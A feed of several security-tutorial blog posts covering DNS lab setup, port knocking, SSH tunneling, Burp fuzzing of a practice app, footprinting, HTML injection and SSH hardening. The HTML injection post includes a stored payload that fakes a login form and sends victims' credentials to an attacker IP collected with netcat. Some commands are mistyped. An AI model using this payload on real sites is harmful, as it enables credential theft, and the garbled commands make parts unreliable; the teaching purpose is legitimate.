  • Select DNS from drop down list server manger, this will open the server on which we have install DNS role. Select your server (WIN-KSR8OM147HH ) make right click on it  and select DNS from that list.

When we select DNS in server Manager it will open a new window as DNS Manager.

Now we will configure Forward lookup zone as well as Reverse Lookup Zone. So to create Forward Lookup Zone, select Forward Lookup Zones and right click on it and select New Zone from menu box to take up the New Zone Wizard then click on next.

It will show the list of Different types of Zones and storage such as Primary Zone, Secondary Zone & Stub Zone.

Zone Types

Primary Zone:  A primary DNS zone has authority of read / writes for DNS server also known as master server. It stores the master copy of zone data in a local file or in AD DS. 

Secondary Zone:  A Secondary DNS Zone is Read-Only copy of a Primary Zone; this DNS server is a secondary resource for information about this zone.

Active Directory Integrated DNS Zone: It is also writeable zone. To make Active Directory Integrated zone the machine must be a domain Controller. RODC (read only domain controller).feature is only available in server 2008 R2.The domain controller must be writeable not read only because it is more secure. There is a security tab in the AD integrated zone, it is a multi master structured. In case of AD integrated zone, DNS database will be replicated as a part of domain replication.

Stub zone: It is nature secondary. It has no database of its own. Its load the database from master DNS. It only takes selective records not the complete database. Three records NS, SOA and Glue A will transfer into stub zone. Stub is read only.

DNS uses port 53 for communication and it uses both TCP and UDP protocols. Dynamic DNS (DDNS) is used to automatically update IP addresses in DNS when changed by DHCP. You will enable DDNS option in the zone properties to secure only.

Select primary zone and click on next.

Give desired Zone name like raj and click on next.

Save this into a new zone file as raj.dns and click on next.

Select Do not allow dynamic updates option, if you want to update these records manually .Click on next then Finish.

Now we had completed the configuration for Forward Lookup Zone; next we will configure reverse lookup zone.

Reverse Lookup Zone:

Domain Name system (DNS) servers can enable clients to determine the DNS name of a host based on the host’s IP address by providing a special zone called a reverse lookup zone. A reverse lookup zone contains pointer (PTR) resource records that map IP addresses to the host name. Some applications, such as secure web applications, rely on reverse lookups.

A reverse lookup takes the form of a question, such as “can you tell me the DNS name of the computer that uses the IP address 192.168.1.120?”

A special domain, the in-addr.arpa  domain, was defined in the DNS standards and reserved in the internet DNS namespace to provide a practical and reliable way to perform reverse queries . In reverse lookup zone the address is written in reverse order.

Step to create a Reverse Lookup Zone:

To create Reverse Lookup Zone, make right click on it and click on New Zone from the inside the menu box to take up the New Zone Wizard.

Select primary zone and click on next.

Click on first radio button for IPv4 reverse Lookup Zone to translate IP address into DNS name then click on next.

Type Network ID field as 192.168.1 which is the first three octets of IP-address of our DNS Server then click on next.

Save this in a new zone file and select first radio button for this step then click on next.

Select Do not allow dynamic updates option, if you want to update these record manually. Click on next.

We have successfully completed configuration for new zone of reverse Lookup. Now just click on finish.

Now you can observe that on the right side of DNS Manager Window, Reverse Lookup Zone is now created that contains two records i.e. SOA and NS in it.

  • Now we are going to create a new pointer in our new zone file i.e. 168.192.in-addr.arpa, as shown in given below image

Here we require host name in order to create new resource record, click on browse to select the record.

Resource Records

Resource records are the DNS database entries to answer DNS client queries. Name, type and data. The client query is always shown under the name title; DNS server answer always shown under the data title, in type different types of records is shown. Common recorded in DNS are A (Name to IP), PTR (reverse of A), SRV, MX, MS, SOA, etc.

Select 2ndfile i.e. name server (NS) record as shown in given below image and click on OK.

DNS Queries

There are two types of queries in DNS:

  • Recursive Query: – It goes from DNS client to DNS server. It answer is complete means processing is complete.
  • Iterative Query: – It goes from DNS server to DNS server. It answer is not complete means its reply is referral. Iterative query is used to reach from one DNS to another DNS. It keeps the reply for 60minutes in his cache.

Verify DNS configuration

Open command prompt and type following command which will search for the Domain Name System (DNS) to find domain name or IP address mapping.

Nslookup 192.168.1.104 (server’s ip)

From given below image you can read the name of NS record/domain name i.e. raj.

Similarly using command nslookup raj we found host IP i.e. 192.168.1.104

AuthorMukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with high level of expertise in handling server side operations based on windows platform. An experienced IT Technical Trainer with over 20 years’ Experience. You can contact him at mukul@ignitetechnologies.in

The post Setup DNS Penetration Testing Lab on Windows Server 2012 appeared first on Hacking Articles.

Categories: Cyber India

How to Secure Port using Port Knocking

Wed, 02/Aug/2017 - 11:04

From Wikipedia

Port knocking is a technique use for sending of information through closed ports on a connected computer in a network behind a firewall. It will add security in your network for establishing connection with a particular port until the correct sequence of port is not knocked. The network administer configure port knocking using iptable which act like firewall.

Iptable chain allows a client who is familiar with the secret knock to enter the network through a specific port by performing a sequence of connection attempts. 

The main reason of port knocking is to avoid an attacker from scanning a system for potentially vulnerable services by performing a port scan, because if the attacker will not sends the accurate knock sequence, the protected ports will appear closed.

Port knocking with Iptables

 Iptables is a command-line firewall service in Linux kernel that uses rule chains to permit or obstruct traffic. It defined various tables that contain a number of integrated chains which may be containing user-defined chains also. Iptable chain is a list of policy that is used to match a set of packets. Every rule/policy specifies the function that should be done with packets that matches

Type given below command with the help of following option which will create a new iptable chain:

-F: –flush [chain]

Flush the selected chain (all the chains in the table if none is given). This is equivalent to deleting all the rules one by one.

-X: delete-chain [chain]

Delete the optional user-defined chain specified. There must be no references to the chain. If there are, you must delete or replace the referring rules before the chain can be deleted. The chain must be empty, i.e. not contain any rules. If no argument is given, it will attempt to delete every non-builtin chain in the table.

-Z: –zero [chain [rulenum]]

Zero the packet and byte counters in all chains, or only the given chain, or only the given rule in a chain. It is legal to specify the -L, –list (list) option as well, to see the counters immediately before they are cleared. 

-N: –new-chain chain

Create a new user-defined chain by the given name. There must be no target of that name already.

-A: –append chain rule-specification

Append one or more rules to the end of the selected chain. When the source and/or destination names resolve to more than one address, a rule will be added for each possible address combination.

-p: –protocol protocol

The protocol of the rule or the packet to check. The specified protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the special keyword “all”, or it can be a numeric value, representing one of these protocols or a different one. A protocol name from /etc/protocols is also allowed. A “!” argument before the protocol inverts the test. The number zero is equivalent to all. All will match with all protocols and is taken as default when this option is omitted.

-m: –match match

Specifies a match to use, that is, an extension module that tests for a specific property. The set of matches make up the condition under which a target is invoked. Matches are evaluated first to last as specified on the command line and work in short-circuit fashion, i.e. if one extension yields false, evaluation will stop.

-j: –jump target

This specifies the target of the rule; i.e., what to do if the packet matches it. The target can be a user-defined chain (other than the one this rule is in), one of the special built-in targets which decide the fate of the packet immediately, or an extension. For example ACCEPT DROP and REJECT.

From ipset.netfilter.org

Iptables -F

Iptables -X

Iptables -Z

Iptables -N STATE0

Iptables -A STATE0 -p tcp -dport 1200 -m recent -name KNOCK1 -set -j DROP

Iptables -A STATE0 -j DROP

Iptables -N STATE1

Iptables -A STATE1 -m recent -name KNOCK1 -remove

Iptables -A STATE1 -p tcp -dport 1300 -m recent -name KNOCK2 -set -j DROP

Iptables -A STATE1 -j STATE0

Iptables -N STATE2

Iptables -A STATE2 -m recent -name KNOCK2 -remove

Iptables -A STATE2 -p tcp -dport 1400 -m recent -name KNOCK3 -set -j DROP

Iptables -A STATE2 -j STATE0

Iptables -N STATE3

Iptables -A STATE3 -m recent -name KNOCK3 -remove

Iptables -A STATE3 -p tcp -dport 22 -j ACCEPT

Iptables -A STATE3 -j STATE0

Iptables -A INPUT -m state – state ESTABLISHED,RELATED -j ACCEPT

Iptables -A INPUT -s 127.0.0.1/8 -j ACCEPT

Iptables -A INPUT -p icmp -j ACCEPT

Iptables -A INPUT -p tcp -dport 80 -j ACCEPT

Iptables -A INPUT -m recent -name KNOCK3 -rcheck -j STATE3

Iptables -A INPUT -m recent -name KNOCK2 -rcheck -j STATE2

Iptables -A INPUT -m recent -name KNOCK1 -rcheck -j STATE1

Iptables -A INPUT -j STATE0

Let’s verify it through port scanning using NMAP command.

Nmap -ST 192.168.0.25

From given below image you can observe that NMAP found only PORT 80 is open.

Type apt-get install knockd command to install knockd.

Knockd is a port-knock command-line utility. It snoops to all traffic on an Ethernet interface, come across for particular “knock” sequences of port knocks. A client makes these port-hits through sending a TCP or UDP packet to a port on the server.

Now type following command for port knocking

Knock -v 192.168.0.25 1200 1300 1400

From given image you can observe that it will start hitting on a particular port which is actually known as port knocking. Since client is aware of sequence he can make correct knocked sequence for connection attempts.

Again use port scanning with NMAP on same target

nmap -p 192.168.0.25

Hence you can see the difference between both NMAP’s result as this time we got port 22 open for SSH service.

Now client will use credential for login into SSH server.

Conclusion! Network admin adds the filter with specific port that will wait for correct knock sequence which will then open the port to establish the connection otherwise it will remain closed the port until correct port knocked

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Secure Port using Port Knocking appeared first on Hacking Articles.

Categories: Cyber India

How to Perform Local SSH Tunneling

Sat, 29/Jul/2017 - 21:19

Hello Friends! Previously we have discussed on SSH tunnel and step to perform dynamic tunneling (port forwarding) which you can read from here. Today we will talk on same scenario and perform local tunneling (port forwarding).

Local tunneling is a process to access a specific SSH client machine for communication. It let you establish the connection on a specific machine which is not connected from internet.

The only difference between dynamic tunneling and local tunneling is that, dynamic tunneling requires socks proxy for tunneling all TCP traffic and local tunneling only required destination IP address.

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

  1. SSH server(two Ethernet interface) 
  2. IP 192.168.1.217 connected to remote system 192.168.1.219
  3. IP 192.168.10.2 connected to local network system 192.168.10.2
  4. SSH client(local network) holds IP 192.168.10.2
  5. Remote system(outside network) holds IP 192.168.1.219

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.1.217 and another 192.168.10.1 as explain above.

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Remote Pc (192.168.1.219) is trying to connect to SSH server (192.168.1.217) via port 22 and get successful login inside server.

Similarly now Remote PC (192.168.1.219) trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for SSH Local tunneling

  • Use putty to connect SSH server (192.168.1.22) via port 22 and choose option SSH >Tunnel given in the left column of category.
  • Give new port forwarded as 7000 and connection type as local 
  • Destination address as 198.168.10.2:22 for establishing connection with specific client and click on ADD at last.
  • Click on open when all things are set.

This will establish connection between remote pc and SSH server.

Open new window of putty and follow given below step:

  • Give hostname as localhost and port 7000 and connection type SSH.
  • Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post How to Perform Local SSH Tunneling appeared first on Hacking Articles.

Categories: Cyber India

Beginner Guide to SSH Tunneling (Dynamic Tunneling)

Fri, 28/Jul/2017 - 14:22

Basically tunneling is process which allows data sharing or communication between two different networks privately. Tunneling is normally perform through encapsulating the private network data and protocol information inside the public network broadcast units so that the private network protocol information visible to the public network as data. 

SSH Tunnel:  Tunneling is the concept to encapsulate the network protocol to another protocol here we put into SSH, so all network communication are encrypted. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, a third use is to hide the nature of the traffic that is run through the tunnels.

Types of SSH Tunneling:

  1. Dynamic SSH tunneling
  2. Local SSH tunneling
  3. Remote ssh tunneling

Let’s Begin!!

Objective:  To establish SSH connection between remote PC and local system of different network.

Here I have set my own lab which consist three systems in following network:

  1. SSH server (two Ethernet interface) 
  2. IP 192.168.1.22 connected to remote system 192.168.1.21
  3. IP 192.168.10.2 connected to local network system 192.168.10.2
  4. SSH client (local network) holds IP 192.168.10.2
  5. Remote system (outside network) holds IP 192.168.1.21

In following image we are trying to explain SSH tunneling process where a remote PC of IP 192.168.1.21 is trying to connect to 192.168.10.2 which is on INTRANET of another network. To establish connection with SSH client, remote PC will create SSH tunnel which will connect with the local system via SSH server.

NOTE: Service SSH must be activated on server as well as client machine.

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.1.22 and another 192.168.0.1 as explain above.

Another image given below is describing network configuration for SSH client which is showing IP 192.168.10.2

Remote Pc (192.168.1.21) is trying to connect to SSH server (192.168.1.22) via port 22 and get successful login inside server.

Similarly now Remote PC (192.168.1.21) trying to connect with Client PC (192.168.10.2) via port 22, since they belongs to different network therefore he receive network error.

Step for SSH Dynamic tunneling

  • Use putty to connect SSH server (192.168.1.22) via port 22 and choose option SSH >Tunnel given in the left column of category.
  • Give new port forwarded as 7000 and connection type as Dynamic and click on ADD at last.
  • Click on open when all things are set.

This will establish connection between remote pc and SSH server.

Now login into putty again give IP of client system as Host Name 192.168.10.2 and Port 22 for SSH then click on open.

Open previous running window of putty choose Proxy option from category and follow given below step:

  • Select proxy type as SOCKS 5
  • Give proxy hostname as 127.0.0.1 and port 7000
  • Click on open to establish connection.

Awesome!! We have successfully access SSH client via port 7000 

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

 

The post Beginner Guide to SSH Tunneling (Dynamic Tunneling) appeared first on Hacking Articles.

Categories: Cyber India

Fuzzing SQL,XSS and Command Injection using Burp Suite

Thu, 27/Jul/2017 - 23:00

From Portswigger

Hello friends!! Today we are going to perform fuzzing testing on bwapp application using burp suite intruder, performing this testing manually is a time consuming and may be boring process for any pentester.

The fuzzing play a vital role in software testing, it is a tool which is use for finding bugs, errors, faults and loophole by injecting a set of partially –arbitrary inputs called fuzz into a program of the application to be tested. Fuzzer tools take structure input in file format to differentiate between valid and invalid inputs. Fuzzer tool are best in identifying vulnerability like sql injection, buffer overflow, xss injection and OS command injection and etc.

Let’s start!!

Fuzzing XSS

 Start burp suite in order to intercept the request and then send intercepted data into Intruder

Many input-based vulnerabilities, such SQL injection, cross-site scripting, and file path traversal can be detected by submitting various test strings in request parameters, and analyzing the application’s responses for error messages and other anomalies.

Considered following as given below:

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: test (user input for first name)

Attack type: Sniper (for one payload)

Set payload which will be placed into payload positions during the attack. Choose payload option to configure your simple list of payload for attack. Configure the payload list using one of Burp’s predefined payload lists containing common fuzz strings.

Burp suite intruder contain fuzzing string for testing xss injection, therefore choose fuzzing –xss and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains random string to test xss vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 1 having length equal to 13926.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Bravo!!  Fuzzing test is completed and it found that application have bug which lead to xss vulnerability. From screenshot you can see it is showing an xss alert prompt.

Fuzzing OS command injection

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions.

Payload position: www.nsa.gov (user input for target)

Attack type: Sniper (for one payload

Burp suite intruder contain fuzzing string which will test for os command injection, therefore choose fuzzing full and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

It will start attack by sending request which contains arbitrary string to test OS command injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 34 having length equal to 13343.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Great Job!!  Fuzzing test is completed and it found that application have bug which lead to OS command vulnerability. From screenshot you can see application is showing ID as per the request of the selected payload.

Fuzzing SQL

Similarly repeat the same process in order to intercept the request and then send intercepted data into Intruder.

Configure the position where payload will be inserted, the attack type determine the way in which payloads are assigned to payload positions. It is much similar like brute force attack.

Payload position: 1:1 (user input for login: password)

Attack type: Cluster bomb (for two payloads)

Burp suite intruder contain fuzzing string which will test for SQL injection, therefore choose fuzzing –SQL Injection for first payload postion and click on ADD tab to load this string into simple list as shown in screenshot and at final click on start attack.

Similarly repeat the same process to set payload option for second payload position.

It will start attack by sending request which contains arbitrary string to test SQL injection vulnerability in the target application. Now from given list of applied string select the payload which has highest length as output as shown in given image, we have select request 168 having length equal to 13648.

Insert selected payload into intercepted request and then forward this request as you can see in given image.

Wonderful!!  Fuzzing test is completed and it found that application have bug which lead to SQL injection vulnerability. From screenshot you can see we had login into Neo’s account without valid input this happens only as per the request of the selected payload.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Fuzzing SQL,XSS and Command Injection using Burp Suite appeared first on Hacking Articles.

Categories: Cyber India

Time Scheduling on SSH Port

Tue, 25/Jul/2017 - 13:00

This article is related to network securities which help the network administrator to secure running service on any server through scheduling task.  We are going to schedule task for SSH service in order to add another layer in security in network , in simple word we are going to set timing limit for SSH service on the server .

Cron is a UNIX like computer utility which schedules a command or script on your server to run automatically at a specified time and date. A cron job is the scheduled task itself. 

Service ssh start

Service ssh status

As you can see from given below image the service SSH is running.

We are going to schedule SSH services using crontab, crontab is built in service of linux to schedule task.

User required root permission to open the crontab, now type following command:

sudo crontab -e

We had open crontab using nano, the given below image shows crontab interface.

Crontab uses the format of “m h dommondow [command]”, Following table will help you in writing schedule for crontab:

Field value ’m’ stands for minute 0-59 h’ for hour 0-23 ‘dom’ for date 1-31 ‘mon’ stands for month 1-12 ‘dow’ stands for day of week 1-7[1 stands for Monday] command the required command to be

Now if we need to schedule a task at 8:00 am on Monday we will write the command as following:

0 8 * * 1 [command]

 Now we are going to use crontab to schedule “ssh service”. We are going to schedule ssh service for 3 minutes and get stop after 4 minutes of use when it is activated.

We use the command for scheduling task:

* * * * * sleep 180;/usr/sbin/service ssh start

Above command will schedule the task for only 3 minutes where 180 is equal to 3 minute and to stop this service ssh after that, type given below command where 240 is equal to 4 minute.

* * * * * sleep 240;/usr/sbin/service ssh stop

Let’s check whether above command is working or not.

Wait for service to reboot. Using nmap we scan port 22

nmap  -p 22 127.0.0..1

After scanning you will observe that ssh service is running port 22 is open.

Nmap  -p 22 127.0.0..1

Now if our command is working properly it should stop itself after 4 minutes get finished, we again check using nmap.

The port is now closed at 4th minute.

Now if I want to schedule a task at a particular time, let’s say I want to schedule my ssh service to start at 5:00 am and close at 5 pm, we use this command:

0 5 * * * /usr/sbin/service ssh start

0 17 * * * /usr/sbin/service ssh stop

This command schedules the ssh service to start every day at 5:00 am and stop the ssh service at 5:00 pm.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast.

The post Time Scheduling on SSH Port appeared first on Hacking Articles.

Categories: Cyber India

Beginner Guide to Website Footprinting

Sun, 23/Jul/2017 - 20:39

In our previous article we have discussed a brief introduction of footprinting for gathering information related to the specific person. As we had discussed that there are so many type of footprinting and today we are going to talk about DNS footprinting, website footprinting and whois footprinting.

Browsing the target Website may Providing

Whos is Details

Software used and version

OS Details

Sub Domains

File Name and File Path

Scripting Platform & CMS Details

Contact Details

Let’s start!!

From Wikipedia 

Whois footprinting

WHOIS (pronounced as the phrase who is) is a query and response protocol and whois footprinting is a method for glance information about ownership of a domain name as following:

  • Domain name details
  • Contact details contain phone no. and email address of owner
  • Registration date for domain name
  • Expire date for domain name
  • Domain name servers
Whois Lookup

It is broadly used in support of querying databases that store the registered users or assignees of an Internet resource, such as domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. The protocol stores and delivers database content in a human-readable format.

Browse given URL http://whois.domaintools.com/in browser and type any domain name.

For example: let’s search pentestlab.in

Now you can see it has created a whois record for pentestlab.in where it contains details like: email address,IP, registrant Org. From given record anyone can guess that this domain have some connection to raj chandel. Then attacker needs to perform footprinting on raj chandel taking help from previous article.

There is so many other tools use for whois footprinting for example:

  • Caller IP
  • Whois Analyzer pro
  • Whois lookup multiple address

DNS Footprinting

Attacker performs DNS footprinting in order to enumerate DNS record details and type of servers. There are 10 type of DNS record which provide important information related to target location.

  1. A/AAAA
  2. SVR
  3. NS
  4. TXT
  5. MX
  6. CNAME
  7. SOA
  8. RP
  9. PTR
  10. HINFO

Domain Dossier: it is an online tool use for complete DNS footprinting as well as whois footprinting.

There are so many online tool use for DNS footprinting , using domain dossier we will check for DNS records of penetstlab.in, select the check box for DNS records and traceroute  and then click on go.

You can observe that, the data which we received from whois lookup and from domain dossier is same in some extent. It has given same email ID as above i.e. rrajchandel@gmail.comand moreover details of DNS records TXT, SOA, NS, MX, A and PTR.

DNS Dumpster: it is also an online use for DNS footprinting.

DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Enumerate a domain and pull back up to 40K subdomains, results are available in a XLS for easy reference.

Repeating same process for pentestlab.in, it will search for its DNS record. From given screenshot you can observe we have received same details as above. More it will create a copy as output file in from XLS. 

You get signal: it is also an online tool use for DNS footprinting as well as for Network footprinting

A reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on that same web server. Data is gathered from search engine results, which are not guaranteed to be complete

Hence we get the IP 72.52.229.111 for pentestlab.inmoreover it dumped the name of 14 other domain which are hosted on same web server.

Website Footprinting

It is technique use for extracting the details related to website as following

  1. Archived description of website
  2. Content management system and framework
  3. Script and platform of the website and webserver
  4. Web crawling
  5. Extract meta data and contact details from website
  6. Website and web page monitoring and analyzer

Archive.org: It is an online tool use for visiting archived version of any website.

Archive.org has search option as wayback machine which is like a time machine for any website. It contains entire information from past till present scenario of any website either their layout or content everything related to website is present inside. In simple words it contains history of any website.

For example I had search for hackingarticles.in archived record of 2012.

 

Built With: It is an online tool use for detecting techniques and framework involved inside running website.

BuiltWith.com technology tracking includes widgets, analytics, frameworks, content management systems, advertisers, content delivery networks, web standards and web servers to name some of the technology categories.

 Taking example of hackingarticles.in again we found following things:

  • Content Management system: wordPress
  • Framework: PHP

Whatweb

Whatweb can identify all sorts of information about a live website, like: Platform, CMS platform, Type of Script, Google Analytics, Webserver Platform, and IP address Country. A pentester can use this tool as both a recon tool & vulnerability scanner.

Open the terminal in kali Linux and type following command

Whatweb www.pentestlab.in

As result we receive same information as above

Web crawling

HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. 

 Give target URL for copy the web site as www.pentestlab.in which starts downloading the website.

http://www.hackingarticles.in/5-ways-crawl-website/

 Web Data Extractor

Web Data Extractor Pro is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. Special feature of WDE Pro is custom extraction of structured data.

Start new project Type target URL as ignitetechnologies.in and select folder to save the output and click on ok.

Now this tool will extract meta data, email contact no. and etc from inside the target URL.

From given screenshot you can see it found 40 meta tags1 email 84-phone number from ignitetechnologies.in website.

Similarly there other tool use as web data extractor:

Web spider

Competitive Intelligence

Website-Watcher is a powerful yet simple website-monitoring tool, perfectly suited to the beginner and advanced user alike.  You can download it from here.

Using new tab and enter target URL which start monitoring the target website.

For example I enter URL hackingarticles.in for monitoring this website.

Similarly there are some other tool uses for monitoring:

On web change

Follow that page

Informinder

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to Website Footprinting appeared first on Hacking Articles.

Categories: Cyber India

Beginner Guide to HTML Injection

Fri, 21/Jul/2017 - 23:02

From W3schools

HTML is the standard Hyper Text Markup Language which use for designing Web pages

  • HTML describes the structure of Web pages using markup.
  • HTML elements are the building blocks of HTML pages.
  • HTML elements are represented by tags.
  • HTML tags label pieces of content such as “heading”, “paragraph”, “table”, and so on.
  • Browsers do not show the HTML tags, but utilize them to submit the content of the page.

HTML Tags

HTML tags are element names surrounded by angle brackets. Their two types of tag starting also known as opening tag and end tag also known as closing tag.

HTML Elements

An HTML element usually consists of a start tag and end tag, with the content inserted in between:

HTML Attributes

Attributes provide additional information about HTML elements. Attributes generally come in form of name/value pairs like: name=”value”

Create web page using html

Generally “Notepad” is use for writing HTML code and save the text file with .html/.htm extension for example “test.html” then open the saved file using any web browser.

To create a simple web page type following code inside notepad and save test.html

<!DOCTYPE html>

<html>

<head>

<title> HTML TUTORIALS</title>

</head>

<body bgcolor=”pink”>

<br>

<center><h2>WELCOME TO HACKING ARTILCES </h2>

<br>

<p>Author “Raj chandel”</p>

</center>

</body>

</html

When you will open test.html in web browser you will see given below image.

The <!DOCTYPE html> declaration defines this document to be HTML5

The <html> element is the root element of an HTML page

The <head> element contains meta information about the document

The <title> element specifies a title for the document

The <body> element contains the visible page content; have bgcolor attribute as “pink”

The <br>element defines break line/next line

The <h1> element defines a large heading

The <p> element defines a paragraph

HTML Versions

Since the early days of the web, there have been many versions of HTML:

Version Year HTML 1991 HTML 2.0 1995 HTML 3.2 1997 HTML 4.01 1999 XHTML 2000 HTML5 2014

To learn more about HTML visit to w3schools.com

HTML injection

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized and the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection.

This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

Their two type of html injection as following:

  • Stored HTML
  • Reflected HTML
Stored HTML

A stored HTML also known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the webserver and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get execute by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for administer or other user.

Example:

An example of a web application vulnerable to stored HTML injection which allow users to submit their entry in blog as shown in the screenshot.

Firstly user “raj” had made a normal entry as attacker which is successfully added in web server database.

Enter following html code inside given text area for making HTML attack.  

<div style=”position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;”>Please login with valid credentials:<br><form name=”login” action=”http://192.168.1.104 /login.htm”><table><tr><td>Username:</td><td><input type=”text” name=”username”/></td></tr><tr><td>Password:</td><td><input type=”text” name=”password”/></td></tr><tr><td colspan=2 align=center><input type=”submit” value=”Login”/></td></tr></table></form></div>

Above HTML code will generate a payload to create user login page on targeted web page and forward that credential to attacker’s IP.

You can see given below login page look valid to user and get stored inside web server.

Now when victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address.

nc -vlp 80

Attacker will receive users credential as response on natcat. From screenshot you can read username=bee & password=bug

Now attacker will use these credential for login.

Reflected HTML

 The reflected HTML HTML is also known as Non Persistence is occurs when the web application respond immediately on user’s input without validating the inputs this lead an attacker to injects browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.

 The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

 Example:

Following web page allow user to submit his first and last name but these text field are vulnerable to HTML injection.

Now type following html code in the text field given for first name which create a link for hackingarticles.in when you click on “RAJ”

 <h1><a href =”http://www.hackingarticles.in”>RAJ</a></h1>

Similarly type following code in given text field for last name:

 <h2>CHANDEL</h2>

Click on Go tab to execute this as first and last name.

From given screenshot you can see it has submitted RAJ CHANDEL and the word “RAJ” contains a link for hackingarticles.in, when you will click on link it will forwarded to hackingarticles.in

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Beginner Guide to HTML Injection appeared first on Hacking Articles.

Categories: Cyber India

How to setup SSH Pentest Lab

Fri, 21/Jul/2017 - 14:05

Probing through every open port is practically the first step hackers take in order to prepare their attack. And in order to work one is required keep their port open but at the same time they are threatened by the fear of hackers. Therefore, one must learn to secure their ports even if they are open.
In this article we will secure SSH port so that even if it’s open no one will be able to exploit it. First of all let’s install SSH server using following command:
sudo apt-get install openssh-server

Once the server is installed start SSH service by typing:

service ssh start

To confirm the working of SSH, use the following command:

service ssh status

As the service of SSH is started, scan it in your kali’s terminal using nmap:

nmap -sV 192.168.1.17

Scanning will show that on port 22 is open with the service of SSH. Configure this port using PUTTY. For configuration in putty, give the IP address in host name along with port number and then select SSH and then finally click on Open.

Upon opening, it will ask for password, give the said password and press enter.

How to Secure SSH Connection

Now that SSH has been configured. We can use our first measure of security i.e. port forwarding. In computer>etc>ssh you will find a file with the name of “sshd_config”.

Open this file and wherever it says port 22, change it to port 2222.

This way we have forwarded SSH service from port 22 to port 2222. Let’s check it on nmap to confirm.

nmap -sV 192.168.1.17

SSH Connection using PGP Keys

This way we have applied our first measure of security. Now for our second measure of security download and install PUTTY Key Generator. Open it and click on Generate button on low right side.

This will generate a public and private key. Out of these save the private key.

The private key will be saved as shown in following image. You can rename it at convenience as I have named it ssh login key.

Now open terminal of your server and type:

ssh-keygen

The above command will create a folder named .ssh and then create an empty text file with the name authorized_keys in the same folder.

Copy the “ssh login key.ppk” file which are created previously into the .ssh folder.

In the terminal, move into .ssh folder and type the following command:

puttygen –L “ssh login key.ppk”

This command will generate a key. Copy this key in the empty file which we created earlier with the authorized_keys.

Then in putty configuration tab, go to data and give Auto-login username

The open SSH>Auth and give the path of SSH login key (private key that was generated).

And then in session tab give the IP address and port number which is now 2222 due to our first measure of security.

And then click on open. It will open without asking for password as you have configured the key.

But this doesn’t mean it can’t be open using password. And still we are vulnerable to hackers. Therefore we are going to apply third measure of security i.e. to disable password completely. For this, go to computer>etc>sshd_config.

Here, change password authentication from yes (as shown the image above) to no and uncomment (as shown in image below).

And now that we have successfully applied three measures of security our port is safe from anyone and everyone. To this port the hacker will require physical access to you hardware which is impossible. And if you want to access SSH from another machine then just configure the same key in that PC too and it have access to it.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

The post How to setup SSH Pentest Lab appeared first on Hacking Articles.

Categories: Cyber India